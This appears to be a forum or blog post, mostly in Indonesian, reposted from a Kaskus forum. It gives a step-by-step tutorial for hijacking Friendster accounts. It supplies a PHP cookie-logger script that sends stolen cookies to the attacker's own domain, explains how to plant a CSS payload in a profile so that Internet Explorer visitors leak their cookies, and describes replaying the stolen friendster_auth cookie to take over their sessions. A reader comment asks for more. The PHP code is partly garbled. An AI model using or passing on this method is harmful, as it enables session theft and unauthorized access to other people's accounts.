Hehehehe, ternyata lebih aman pake firefox...
How To Hack Friendster?
I quoted it from CCPB forum at Kaskus Network.
Yang perlu di sediakan:
1. Punya account FS (Wajib)
2. Punya website yg support PHP
3. Pake Firefox !! (Yay..!! FF Rules..!!)
4. Extension Add n Edit Cookies, Download Buat FF 0.9 - 1.6 , Buat FF 2.0
5. Indomie goreng, Kopi and cemilan. Biar ga BT or Laper
Step by step :
1. Create file cook.php (its okay if you use another name). Content of the file:
PHP Code:<?php
$kokis = $HTTP_GET_VARS['kukis'];
$filename = "cok.log";
// metodhe with append append$handle = fopen($filename, 'a');
fwrite($handle, $kokis);
// redirect to your friend
echo "<script>document.location='http://www.friendster.com/';</script>";
2. Upload that file to your web hosting which is support PHP.
3. Login to your FS account
4. Enter to 'edit profile' >> CSS (Customize)
5. Paste code below in CSS sectionbody{
Change www.site-elu.com with your domain.
Now, how to hack it? Whats next?
Relax.. Everybody who is open your profile with Internet Explorer, his/her cookies will be save at cok.log file on your site.
How to use it:
1. Open _http://www.site-elu.com/cok.log
2. Find the cookies with friendster_auth= name, ignore the rest. Example:Result :
Replace karakter ascii "=" dengan %3D
Replace karakter ascii "&" dengan %26
Replace karakter ascii "*" dengan %2A
Final result :
3. Open AnEC Cookie Editor in FireFox
4. Filter cookies from Friendster.com
5. Find cookies with friendster_auth, then edit!
6. Change the content with the final result we got, then Save! Another cookies from friendster may be removed.
7. Open _http://www.friendster.com/ then have a big laugh
Only works in Internet Explorer.
can you teach more of this?